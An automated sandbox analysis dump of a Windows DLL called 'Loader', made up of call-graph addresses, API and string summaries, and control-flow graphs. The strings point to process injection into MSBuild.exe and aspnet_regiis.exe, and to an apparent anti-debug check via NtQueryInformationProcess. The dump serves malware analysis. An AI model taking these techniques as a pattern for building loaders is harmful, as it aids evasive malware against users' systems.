13630->13632 13635 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 13630->13635 13639 6d7e5576 13632->13639 13633 6d7e59a6 13666 6d7e59c3 13633->13666 13636 6d7e59e3 13635->13636 13637 6d7e597a 13637->13633 13638 6d7e49e0 __freea 14 API calls 13637->13638 13638->13633 13670 6d7e507a 13639->13670 13642 6d7e55a9 13644 6d7e55c0 13642->13644 13645 6d7e55ae GetACP 13642->13645 13643 6d7e5597 GetOEMCP 13643->13644 13644->13610 13644->13611 13645->13644 13647 6d7e5576 41 API calls 13646->13647 13648 6d7e5a5f 13647->13648 13649 6d7e5b64 13648->13649 13650 6d7e5a9c IsValidCodePage 13648->13650 13656 6d7e5ab7 std::bad_exception::bad_exception 13648->13656 13651 6d7de360 _ValidateLocalCookies 5 API calls 13649->13651 13650->13649 13652 6d7e5aae 13650->13652 13653 6d7e5886 13651->13653 13654 6d7e5ad7 GetCPInfo 13652->13654 13652->13656 13653->13618 13653->13622 13654->13649 13654->13656 13713 6d7e564a 13656->13713 13658 6d7e5474 __FrameHandler3::FrameUnwindToState 13657->13658 13796 6d7e4828 EnterCriticalSection 13658->13796 13660 6d7e547e 13797 6d7e54b5 13660->13797 13665->13637 13669 6d7e4870 LeaveCriticalSection 13666->13669 13668 6d7e59ca 13668->13630 13669->13668 13671 6d7e5098 13670->13671 13677 6d7e5091 13670->13677 13672 6d7e445c _unexpected 39 API calls 13671->13672 13671->13677 13673 6d7e50b9 13672->13673 13678 6d7e6eb2 13673->13678 13677->13642 13677->13643 13679 6d7e50cf 13678->13679 13680 6d7e6ec5 13678->13680 13682 6d7e6f10 13679->13682 13680->13679 13686 6d7e7391 13680->13686 13683 6d7e6f38 13682->13683 13684 6d7e6f23 13682->13684 13683->13677 13684->13683 13708 6d7e5a2c 13684->13708 13687 6d7e739d __FrameHandler3::FrameUnwindToState 13686->13687 13688 6d7e445c _unexpected 39 API calls 13687->13688 13689 6d7e73a6 13688->13689 13690 6d7e73ec 13689->13690 13699 6d7e4828 EnterCriticalSection 13689->13699 13690->13679 13692 6d7e73c4 13700 6d7e7412 13692->13700 13697 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 13698 6d7e7411 13697->13698 13699->13692 13701 6d7e7420 _unexpected 13700->13701 13703 6d7e73d5 13700->13703 13702 6d7e7145 _unexpected 14 API calls 13701->13702 13701->13703 13702->13703 13704 6d7e73f1 13703->13704 13707 6d7e4870 LeaveCriticalSection 13704->13707 13706 6d7e73e8 13706->13690 13706->13697 13707->13706 13709 6d7e445c _unexpected 39 API calls 13708->13709 13710 6d7e5a31 13709->13710 13711 6d7e5944 ___scrt_uninitialize_crt 39 API calls 13710->13711 13712 6d7e5a3c 13711->13712 13712->13683 13714 6d7e5672 GetCPInfo 13713->13714 13715 6d7e573b 13713->13715 13714->13715 13721 6d7e568a 13714->13721 13717 6d7de360 _ValidateLocalCookies 5 API calls 13715->13717 13719 6d7e57ed 13717->13719 13719->13649 13724 6d7e76d2 13721->13724 13723 6d7e8083 43 API calls 13723->13715 13725 6d7e507a 39 API calls 13724->13725 13726 6d7e76f2 13725->13726 13744 6d7e5dde 13726->13744 13728 6d7e77ae 13731 6d7de360 _ValidateLocalCookies 5 API calls 13728->13731 13729 6d7e77a6 13747 6d7e77d3 13729->13747 13730 6d7e771f 13730->13728 13730->13729 13733 6d7e6e64 15 API calls 13730->13733 13735 6d7e7744 std::bad_exception::bad_exception 13730->13735 13734 6d7e56f2 13731->13734 13733->13735 13739 6d7e8083 13734->13739 13735->13729 13736 6d7e5dde ___scrt_uninitialize_crt MultiByteToWideChar 13735->13736 13737 6d7e778d 13736->13737 13737->13729 13738 6d7e7794 GetStringTypeW 13737->13738 13738->13729 13740 6d7e507a 39 API calls 13739->13740 13741 6d7e8096 13740->13741 13753 6d7e7e94 13741->13753 13751 6d7e5d46 13744->13751 13748 6d7e77df 13747->13748 13749 6d7e77f0 13747->13749 13748->13749 13750 6d7e49e0 __freea 14 API calls 13748->13750 13749->13728 13750->13749 13752 6d7e5d57 MultiByteToWideChar 13751->13752 13752->13730 13754 6d7e7eaf 13753->13754 13755 6d7e5dde ___scrt_uninitialize_crt MultiByteToWideChar 13754->13755 13759 6d7e7ef3 13755->13759 13756 6d7e806e 13757 6d7de360 _ValidateLocalCookies 5 API calls 13756->13757 13758 6d7e5713 13757->13758 13758->13723 13759->13756 13760 6d7e6e64 15 API calls 13759->13760 13762 6d7e7f19 13759->13762 13773 6d7e7fc1 13759->13773 13760->13762 13761 6d7e77d3 __freea 14 API calls 13761->13756 13763 6d7e5dde ___scrt_uninitialize_crt MultiByteToWideChar 13762->13763 13762->13773 13764 6d7e7f62 13763->13764 13764->13773 13781 6d7e638f 13764->13781 13767 6d7e7f98 13772 6d7e638f 6 API calls 13767->13772 13767->13773 13768 6d7e7fd0 13769 6d7e8059 13768->13769 13770 6d7e6e64 15 API calls 13768->13770 13774 6d7e7fe2 13768->13774 13771 6d7e77d3 __freea 14 API calls 13769->13771 13770->13774 13771->13773 13772->13773 13773->13761 13774->13769 13775 6d7e638f 6 API calls 13774->13775 13776 6d7e8025 13775->13776 13776->13769 13777 6d7e5e98 ___scrt_uninitialize_crt WideCharToMultiByte 13776->13777 13778 6d7e803f 13777->13778 13778->13769 13779 6d7e8048 13778->13779 13780 6d7e77d3 __freea 14 API calls 13779->13780 13780->13773 13787 6d7e6062 13781->13787 13785 6d7e63e0 LCMapStringW 13786 6d7e63a0 13785->13786 13786->13767 13786->13768 13786->13773 13788 6d7e6161 _unexpected 5 API calls 13787->13788 13789 6d7e6078 13788->13789 13789->13786 13790 6d7e63ec 13789->13790 13793 6d7e607c 13790->13793 13792 6d7e63f7 13792->13785 13794 6d7e6161 _unexpected 5 API calls 13793->13794 13795 6d7e6092 13794->13795 13795->13792 13796->13660 13807 6d7e5c44 13797->13807 13799 6d7e54d7 13800 6d7e5c44 39 API calls 13799->13800 13801 6d7e54f6 13800->13801 13802 6d7e548b 13801->13802 13803 6d7e49e0 __freea 14 API calls 13801->13803 13804 6d7e54a9 13802->13804 13803->13802 13821 6d7e4870 LeaveCriticalSection 13804->13821 13806 6d7e5497 13806->13623 13808 6d7e5c55 13807->13808 13812 6d7e5c51 CatchIt 13807->13812 13809 6d7e5c5c 13808->13809 13813 6d7e5c6f std::bad_exception::bad_exception 13808->13813 13810 6d7e4970 __dosmaperr 14 API calls 13809->13810 13811 6d7e5c61 13810->13811 13814 6d7e2e99 ___std_exception_copy 39 API calls 13811->13814 13812->13799 13813->13812 13815 6d7e5c9d 13813->13815 13816 6d7e5ca6 13813->13816 13814->13812 13817 6d7e4970 __dosmaperr 14 API calls 13815->13817 13816->13812 13818 6d7e4970 __dosmaperr 14 API calls 13816->13818 13819 6d7e5ca2 13817->13819 13818->13819 13820 6d7e2e99 ___std_exception_copy 39 API calls 13819->13820 13820->13812 13821->13806 13853 6d7e495d 13822->13853 13824 6d7e4921 __dosmaperr 13825 6d7e4970 __dosmaperr 14 API calls 13824->13825 13826 6d7e4934 13825->13826 13826->13564 13828 6d7e507a 39 API calls 13827->13828 13829 6d7e5157 13828->13829 13830 6d7e5169 13829->13830 13856 6d7e6226 13829->13856 13832 6d7e52ca 13830->13832 13833 6d7e52e6 13832->13833 13834 6d7e52d7 13832->13834 13835 6d7e52ee 13833->13835 13836 6d7e5313 13833->13836 13834->13564 13835->13834 13862 6d7e538c 13835->13862 13837 6d7e5e98 ___scrt_uninitialize_crt WideCharToMultiByte 13836->13837 13839 6d7e5323 13837->13839 13840 6d7e532a GetLastError 13839->13840 13841 6d7e5340 13839->13841 13842 6d7e4916 __dosmaperr 14 API calls 13840->13842 13843 6d7e538c 14 API calls 13841->13843 13847 6d7e5351 13841->13847 13845 6d7e5336 13842->13845 13843->13847 13846 6d7e4970 __dosmaperr 14 API calls 13845->13846 13846->13834 13847->13834 13866 6d7e5121 13847->13866 13849 6d7e536b GetLastError 13850 6d7e4916 __dosmaperr 14 API calls 13849->13850 13851 6d7e5377 13850->13851 13852 6d7e4970 __dosmaperr 14 API calls 13851->13852 13852->13834 13854 6d7e45ad __dosmaperr 14 API calls 13853->13854 13855 6d7e4962 13854->13855 13855->13824 13859 6d7e6048 13856->13859 13860 6d7e6161 _unexpected 5 API calls 13859->13860 13861 6d7e605e 13860->13861 13861->13830 13863 6d7e5397 13862->13863 13864 6d7e4970 __dosmaperr 14 API calls 13863->13864 13865 6d7e53a0 13864->13865 13865->13834 13867 6d7e5e98 ___scrt_uninitialize_crt WideCharToMultiByte 13866->13867 13868 6d7e513e 13867->13868 13868->13834 13868->13849 13872 6d7e5cc5 13869->13872 13873 6d7e507a 39 API calls 13872->13873 13874 6d7e5cd8 13873->13874 13874->13570 14403 6d7e959e 14404 6d7e95b1 ___std_exception_copy 14403->14404 14409 6d7e9479 14404->14409 14406 6d7e95bd 14407 6d7e2bd5 ___std_exception_copy 39 API calls 14406->14407 14408 6d7e95c9 14407->14408 14410 6d7e9485 __FrameHandler3::FrameUnwindToState 14409->14410 14411 6d7e948f 14410->14411 14412 6d7e94b2 14410->14412 14413 6d7e2e1c ___std_exception_copy 39 API calls 14411->14413 14414 6d7e94aa 14412->14414 14420 6d7e6e3c EnterCriticalSection 14412->14420 14413->14414 14414->14406 14416 6d7e94d0 14421 6d7e9510 14416->14421 14418 6d7e94dd 14435 6d7e9508 14418->14435 14420->14416 14422 6d7e951d 14421->14422 14423 6d7e9540 14421->14423 14424 6d7e2e1c ___std_exception_copy 39 API calls 14422->14424 14425 6d7e6c51 ___scrt_uninitialize_crt 64 API calls 14423->14425 14433 6d7e9538 14423->14433 14424->14433 14426 6d7e9558 14425->14426 14438 6d7e911b 14426->14438 14429 6d7e70a1 ___scrt_uninitialize_crt 39 API calls 14430 6d7e956c 14429->14430 14442 6d7e9d8c 14430->14442 14433->14418 14434 6d7e49e0 __freea 14 API calls 14434->14433 14497 6d7e6e50 LeaveCriticalSection 14435->14497 14437 6d7e950e 14437->14414 14439 6d7e9144 14438->14439 14440 6d7e9132 14438->14440 14439->14429 14440->14439 14441 6d7e49e0 __freea 14 API calls 14440->14441 14441->14439 14443 6d7e9573 14442->14443 14444 6d7e9db5 14442->14444 14443->14433 14443->14434 14445 6d7e9e04 14444->14445 14447 6d7e9ddc 14444->14447 14446 6d7e2e1c ___std_exception_copy 39 API calls 14445->14446 14446->14443 14449 6d7e9cfb 14447->14449 14450 6d7e9d07 __FrameHandler3::FrameUnwindToState 14449->14450 14457 6d7e8341 EnterCriticalSection 14450->14457 14452 6d7e9d15 14453 6d7e9d46 14452->14453 14458 6d7e9e2f 14452->14458 14471 6d7e9d80 14453->14471 14457->14452 14474 6d7e8418 14458->14474 14460 6d7e9e45 14487 6d7e8387 14460->14487 14462 6d7e9e3f 14462->14460 14463 6d7e9e77 14462->14463 14464 6d7e8418 ___scrt_uninitialize_crt 39 API calls 14462->14464 14463->14460 14465 6d7e8418 ___scrt_uninitialize_crt 39 API calls 14463->14465 14467 6d7e9e6e 14464->14467 14466 6d7e9e83 CloseHandle 14465->14466 14466->14460 14468 6d7e9e8f GetLastError 14466->14468 14469 6d7e8418 ___scrt_uninitialize_crt 39 API calls 14467->14469 14468->14460 14469->14463 14470 6d7e9e9d ___scrt_uninitialize_crt 14470->14453 14496 6d7e8364 LeaveCriticalSection 14471->14496 14473 6d7e9d69 14473->14443 14475 6d7e8425 14474->14475 14478 6d7e843a 14474->14478 14476 6d7e495d __dosmaperr 14 API calls 14475->14476 14477 6d7e842a 14476->14477 14480 6d7e4970 __dosmaperr 14 API calls 14477->14480 14479 6d7e495d __dosmaperr 14 API calls 14478->14479 14481 6d7e845f 14478->14481 14482 6d7e846a 14479->14482 14483 6d7e8432 14480->14483 14481->14462 14484 6d7e4970 __dosmaperr 14 API calls 14482->14484 14483->14462 14485 6d7e8472 14484->14485 14486 6d7e2e99 ___std_exception_copy 39 API calls 14485->14486 14486->14483 14488 6d7e83fd 14487->14488 14489 6d7e8396 14487->14489 14490 6d7e4970 __dosmaperr 14 API calls 14488->14490 14489->14488 14495 6d7e83c0 14489->14495 14491 6d7e8402 14490->14491 14492 6d7e495d __dosmaperr 14 API calls 14491->14492 14493 6d7e83ed 14492->14493 14493->14470 14494 6d7e83e7 SetStdHandle 14494->14493 14495->14493 14495->14494 14496->14473 14497->14437 14498 6d7e3897 14499 6d7e38a9 14498->14499 14500 6d7e38af 14498->14500 14501 6d7e3868 14 API calls 14499->14501 14501->14500 14502 6d7e1b92 14503 6d7de360 _ValidateLocalCookies 5 API calls 14502->14503 14504 6d7e1ba4 ___CxxFrameHandler 14503->14504 13875 6d7d5510 13876 6d7d5526 13875->13876 13878 6d7d5583 13876->13878 13879 6d7d55a0 13876->13879 13880 6d7d55fa std::bad_exception::bad_exception 13879->13880 13881 6d7df8b0 ___std_exception_copy 39 API calls 13880->13881 13882 6d7d5772 13881->13882 13883 6d7de360 _ValidateLocalCookies 5 API calls 13882->13883 13884 6d7d5785 13883->13884 13884->13876 14505 6d7e3786 14506 6d7e379b 14505->14506 14507 6d7e4983 _unexpected 14 API calls 14506->14507 14508 6d7e37c2 14507->14508 14509 6d7e37ca 14508->14509 14517 6d7e37d4 14508->14517 14510 6d7e49e0 __freea 14 API calls 14509->14510 14526 6d7e37d0 14510->14526 14511 6d7e3831 14512 6d7e49e0 __freea 14 API calls 14511->14512 14512->14526 14513 6d7e4983 _unexpected 14 API calls 14513->14517 14514 6d7e3840 14515 6d7e3868 14 API calls 14514->14515 14518 6d7e3846 14515->14518 14516 6d7e3f36 ___std_exception_copy 39 API calls 14516->14517 14517->14511 14517->14513 14517->14514 14517->14516 14519 6d7e385b 14517->14519 14521 6d7e49e0 __freea 14 API calls 14517->14521 14520 6d7e49e0 __freea 14 API calls 14518->14520 14522 6d7e2ec6 ___std_exception_copy 11 API calls 14519->14522 14523 6d7e384d 14520->14523 14521->14517 14525 6d7e3867 14522->14525 14524 6d7e49e0 __freea 14 API calls 14523->14524 14524->14526 14527 6d7df086 14528 6d7d55a0 std::bad_exception::bad_exception 39 API calls 14527->14528 14529 6d7df094 14528->14529 13885 6d7cbd00 13887 6d7cbd1b 13885->13887 13886 6d7cbe92 13887->13886 13889 6d7cbf20 13887->13889 13892 6d7cbf3a 13889->13892 13890 6d7d7430 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13890->13892 13891 6d7cc096 13891->13887 13892->13890 13892->13891 13893 6d7cd500 13897 6d7cd56b 13893->13897 13894 6d7da120 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13894->13897 13895 6d7de060 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13895->13897 13897->13894 13897->13895 13898 6d7cdbd2 13897->13898 13901 6d7dc8a0 13897->13901 13899 6d7de360 _ValidateLocalCookies 5 API calls 13898->13899 13900 6d7cdbdc 13899->13900 13904 6d7dc8c7 13901->13904 13902 6d7de360 _ValidateLocalCookies 5 API calls 13903 6d7dca21 13902->13903 13903->13897 13904->13902 13905 6d7cca00 13908 6d7cca56 13905->13908 13906 6d7dc8a0 5 API calls 13907 6d7ccbf1 13906->13907 13909 6d7de360 _ValidateLocalCookies 5 API calls 13907->13909 13908->13906 13910 6d7ccbfb 13909->13910 14530 6d7e6482 GetStartupInfoW 14531 6d7e649f 14530->14531 14532 6d7e6533 14530->14532 14531->14532 14536 6d7e82a3 14531->14536 14534 6d7e64c7 14534->14532 14535 6d7e64f7 GetFileType 14534->14535 14535->14534 14537 6d7e82af __FrameHandler3::FrameUnwindToState 14536->14537 14538 6d7e82b8 14537->14538 14539 6d7e82d9 14537->14539 14540 6d7e4970 __dosmaperr 14 API calls 14538->14540 14549 6d7e4828 EnterCriticalSection 14539->14549 14542 6d7e82bd 14540->14542 14543 6d7e2e99 ___std_exception_copy 39 API calls 14542->14543 14544 6d7e82c7 14543->14544 14544->14534 14545 6d7e8311 14557 6d7e8338 14545->14557 14547 6d7e82e5 14547->14545 14550 6d7e81f3 14547->14550 14549->14547 14551 6d7e4983 _unexpected 14 API calls 14550->14551 14552 6d7e8205 14551->14552 14554 6d7e6344 6 API calls 14552->14554 14556 6d7e8212 14552->14556 14553 6d7e49e0 __freea 14 API calls 14555 6d7e8267 14553->14555 14554->14552 14555->14547 14556->14553 14560 6d7e4870 LeaveCriticalSection 14557->14560 14559 6d7e833f 14559->14544 14560->14559 14561 6d7c2780 14568 6d7c27bb 14561->14568 14562 6d7c310f 14563 6d7de360 _ValidateLocalCookies 5 API calls 14562->14563 14564 6d7c3119 14563->14564 14568->14562 14571 6d7dd710 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14568->14571 14572 6d7dd540 14568->14572 14576 6d7dd6a0 14568->14576 14580 6d7cb3f0 14568->14580 14584 6d7caac0 14568->14584 14592 6d7cb7c0 14568->14592 14571->14568 14574 6d7dd555 14572->14574 14573 6d7dd68a 14573->14568 14574->14573 14596 6d7dd780 14574->14596 14577 6d7dd6b3 14576->14577 14578 6d7dd780 5 API calls 14577->14578 14579 6d7dd701 14578->14579 14579->14568 14581 6d7cb448 14580->14581 14582 6d7de360 _ValidateLocalCookies 5 API calls 14581->14582 14583 6d7cb780 14582->14583 14583->14568 14590 6d7caaeb 14584->14590 14585 6d7cb7c0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14585->14590 14586 6d7cb357 14587 6d7de360 _ValidateLocalCookies 5 API calls 14586->14587 14588 6d7cb367 14587->14588 14588->14568 14590->14585 14590->14586 14600 6d7dd940 14590->14600 14604 6d7ddb00 14590->14604 14593 6d7cb813 14592->14593 14594 6d7de360 _ValidateLocalCookies 5 API calls 14593->14594 14595 6d7cb99a 14594->14595 14595->14568 14597 6d7dd7cd 14596->14597 14598 6d7de360 _ValidateLocalCookies 5 API calls 14597->14598 14599 6d7dd926 14598->14599 14599->14574 14601 6d7dd99d 14600->14601 14602 6d7de360 _ValidateLocalCookies 5 API calls 14601->14602 14603 6d7ddaee 14602->14603 14603->14590 14607 6d7ddb58 14604->14607 14605 6d7de360 _ValidateLocalCookies 5 API calls 14606 6d7ddca3 14605->14606 14606->14590 14607->14605 13911 6d7e7800 13912 6d7e783a 13911->13912 13913 6d7e4970 __dosmaperr 14 API calls 13912->13913 13918 6d7e784e 13912->13918 13914 6d7e7843 13913->13914 13916 6d7e2e99 ___std_exception_copy 39 API calls 13914->13916 13915 6d7de360 _ValidateLocalCookies 5 API calls 13917 6d7e785b 13915->13917 13916->13918 13918->13915 13919 6d7e1600 13920 6d7e1612 13919->13920 13922 6d7e1620 13919->13922 13921 6d7de360 _ValidateLocalCookies 5 API calls 13920->13921 13921->13922
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Memory$Write$Thread$AllocateCreate$CloseContextHandleProcessWindow$AllocConsoleResumeShow
                                                                  • String ID: &6yi$)A@$)A@$;>5,$;>5,$?q8O$?q8O$@$@ga$@ga$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$Mgq$Q+-U$Q+-U$c~p~$imeAsFileTime$kernel32.dll$ntdll.dll${iJR$,|!$}Or$;=$;=
                                                                  • API String ID: 2629464112-488742043
                                                                  • Opcode ID: e050b8e649ac6dd859d82e6d98f5a50c9fdc722d8f76d27633732404846d0ea1
                                                                  • Instruction ID: c57105fd4cb573cd732977f40e938165a8b64e89c13316815e07b22bbcdc51c9
                                                                  • Opcode Fuzzy Hash: e050b8e649ac6dd859d82e6d98f5a50c9fdc722d8f76d27633732404846d0ea1
                                                                  • Instruction Fuzzy Hash: 04A30372A54211CFCB158E7CDE987DA7BF2AB46371F00869AC414EB255C6368E89CF43
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$Close$Module$FileInformationProtectViewVirtual
                                                                  • String ID: ?hl$?hl$@$Og.$c:O$c:O
                                                                  • API String ID: 2781695713-1186043292
                                                                  • Opcode ID: d4539194323ddd0cf5a3cfa001758eabb46eec4e0c0fe6f45a7670f31cf4a869
                                                                  • Instruction ID: 4ca9d2361d5d6a82a518d18b88b1449f0dd4acf72017d9cdd21d5bc2ad66a7af
                                                                  • Opcode Fuzzy Hash: d4539194323ddd0cf5a3cfa001758eabb46eec4e0c0fe6f45a7670f31cf4a869
                                                                  • Instruction Fuzzy Hash: 69B2AB79A142158FDB04CE7CCA957ADBBF1FB4A320F1081AAE419DB351C7369989CF42

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1241 6d7c0a10-6d7c0a4e GetModuleHandleW call 6d7bff00 1244 6d7c0a55-6d7c0a60 1241->1244 1245 6d7c0c55-6d7c0c96 1244->1245 1246 6d7c0a66-6d7c0a73 1244->1246 1248 6d7c0f37 1245->1248 1249 6d7c0a79-6d7c0a86 1246->1249 1250 6d7c0f30 1246->1250 1248->1244 1252 6d7c0a8c-6d7c0a99 1249->1252 1253 6d7c0d14-6d7c0d1b 1249->1253 1250->1248 1255 6d7c0a9f-6d7c0aac 1252->1255 1256 6d7c0c43-6d7c0c50 1252->1256 1253->1248 1258 6d7c0be2-6d7c0c2c NtQueryInformationProcess 1255->1258 1259 6d7c0ab2-6d7c0abf 1255->1259 1256->1248 1258->1248 1261 6d7c0ac5-6d7c0ad2 1259->1261 1262 6d7c0bb3-6d7c0bdd call 6d7df170 1259->1262 1266 6d7c0ad8-6d7c0ae5 1261->1266 1267 6d7c0e06-6d7c0e0d 1261->1267 1262->1248 1269 6d7c0d3f-6d7c0dad 1266->1269 1270 6d7c0aeb-6d7c0af8 1266->1270 1267->1248 1269->1248 1272 6d7c0afe-6d7c0b0b 1270->1272 1273 6d7c0c31-6d7c0c3e 1270->1273 1275 6d7c0d20-6d7c0d2e 1272->1275 1276 6d7c0b11-6d7c0b1e 1272->1276 1273->1248 1275->1248 1278 6d7c0b24-6d7c0b31 1276->1278 1279 6d7c0d33-6d7c0d3a 1276->1279 1281 6d7c0e85-6d7c0ef3 1278->1281 1282 6d7c0b37-6d7c0b44 1278->1282 1279->1248 1281->1248 1284 6d7c0b4a-6d7c0b57 1282->1284 1285 6d7c0c9b-6d7c0d0f 1282->1285 1287 6d7c0b5d-6d7c0b6a 1284->1287 1288 6d7c0f24-6d7c0f2b 1284->1288 1285->1248 1290 6d7c0b70-6d7c0b7d 1287->1290 1291 6d7c0db2-6d7c0e01 1287->1291 1288->1248 1293 6d7c0ef8-6d7c0f11 call 6d7de360 1290->1293 1294 6d7c0b83-6d7c0b90 1290->1294 1291->1248 1297 6d7c0b96-6d7c0ba3 1294->1297 1298 6d7c0e12-6d7c0e80 1294->1298 1301 6d7c0ba9-6d7c0bae 1297->1301 1302 6d7c0f12-6d7c0f1f 1297->1302 1298->1248 1301->1248 1302->1248
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID: '~AL$NtQueryInformationProcess$ntdll.dll
                                                                  • API String ID: 4139908857-2352337104
                                                                  • Opcode ID: efad395a2fa709286f8782fa1e8f468306efc05143fa0e17379cce1b33ea179d
                                                                  • Instruction ID: 59c6fbd65500300c8aaf426c313187618d84a4c1f07ab2f0b7951cb3d2728047
                                                                  • Opcode Fuzzy Hash: efad395a2fa709286f8782fa1e8f468306efc05143fa0e17379cce1b33ea179d
                                                                  • Instruction Fuzzy Hash: 30C1CDB2A652058FCB05CE7DC6947DEBBF1EB46324F10851AE421DB790C7359A4ACB83

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1191 6d7de848-6d7de85b call 6d7dee80 1194 6d7de85d-6d7de85f 1191->1194 1195 6d7de861-6d7de883 call 6d7de3b2 1191->1195 1196 6d7de8ca-6d7de8d9 1194->1196 1199 6d7de885-6d7de8c8 call 6d7de47d call 6d7defbe call 6d7df025 call 6d7de8dd call 6d7de61e call 6d7de8ea 1195->1199 1200 6d7de8f0-6d7de909 call 6d7ded57 call 6d7dee80 1195->1200 1199->1196 1211 6d7de90b-6d7de911 1200->1211 1212 6d7de91a-6d7de921 1200->1212 1211->1212 1214 6d7de913-6d7de915 1211->1214 1215 6d7de92d-6d7de941 dllmain_raw 1212->1215 1216 6d7de923-6d7de926 1212->1216 1218 6d7de9f3-6d7dea02 1214->1218 1221 6d7de9ea-6d7de9f1 1215->1221 1222 6d7de947-6d7de958 dllmain_crt_dispatch 1215->1222 1216->1215 1219 6d7de928-6d7de92b 1216->1219 1223 6d7de95e-6d7de970 call 6d7ca4b0 1219->1223 1221->1218 1222->1221 1222->1223 1230 6d7de999-6d7de99b 1223->1230 1231 6d7de972-6d7de974 1223->1231 1233 6d7de99d-6d7de9a0 1230->1233 1234 6d7de9a2-6d7de9b3 dllmain_crt_dispatch 1230->1234 1231->1230 1232 6d7de976-6d7de994 call 6d7ca4b0 call 6d7de848 dllmain_raw 1231->1232 1232->1230 1233->1221 1233->1234 1234->1221 1236 6d7de9b5-6d7de9e7 dllmain_raw 1234->1236 1236->1221
                                                                  APIs
                                                                  • __RTC_Initialize.LIBCMT ref: 6D7DE88F
                                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 6D7DE8A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                                  • String ID:
                                                                  • API String ID: 2442719207-0
                                                                  • Opcode ID: fe7ce8dd448b11f736cc67d2d4f22571d67d1547756cebc33df22d2049fccb1c
                                                                  • Instruction ID: a9ec71ded81441fd6ebba1c3aa1ebe767fe095171f4a68bf1a16447ea25a3f47
                                                                  • Opcode Fuzzy Hash: fe7ce8dd448b11f736cc67d2d4f22571d67d1547756cebc33df22d2049fccb1c
                                                                  • Instruction Fuzzy Hash: 9141E472D0A62DAFDBA39F54CA04BBEBA74EB80A74F114026E994D6140C7704D41CBE3

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
